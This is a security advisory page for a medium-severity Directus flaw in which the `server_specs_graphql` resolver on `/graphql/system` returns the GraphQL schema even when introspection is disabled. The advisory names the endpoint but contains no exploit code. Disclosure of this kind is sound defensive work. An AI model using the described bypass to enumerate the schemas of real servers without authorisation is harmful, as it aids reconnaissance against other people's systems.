CVE-2026-35413
MEDIUM
GHSA-wxwm-3fxv-mrvx
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Lifecycle Timeline
3Description
## Summary When `GRAPHQL_INTROSPECTION=false` is configured, Directus correctly blocks standard GraphQL introspection queries (`__schema`, `__type`). However, the `server_specs_graphql` resolver on the `/graphql/system` endpoint returns an equivalent SDL representation of the schema and was not subject to the same restriction. This allowed the introspection control to be bypassed, exposing schema structure (collection names, field names, types, and relationships) to unauthenticated users at the public permission level, and to authenticated users at their permitted permission level. ## Impact Administrators who set `GRAPHQL_INTROSPECTION=false` to hide schema structure from clients would have had a false sense of security, as equivalent schema information remained accessible via the SDL endpoint without authentication. ## Credit This vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).
Analysis
Directus allows information disclosure of GraphQL schema structure via the `/graphql/system` endpoint when `GRAPHQL_INTROSPECTION=false` is configured, exposing collection names, field names, types, and relationships to unauthenticated users and authenticated users at their permission level. The vulnerability bypasses the introspection control mechanism by returning an equivalent SDL (Schema Definition Language) representation through the `server_specs_graphql` resolver, giving administrators a false sense of security while schema information remains publicly accessible.
Sign in for full analysis, threat intelligence, and remediation guidance.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today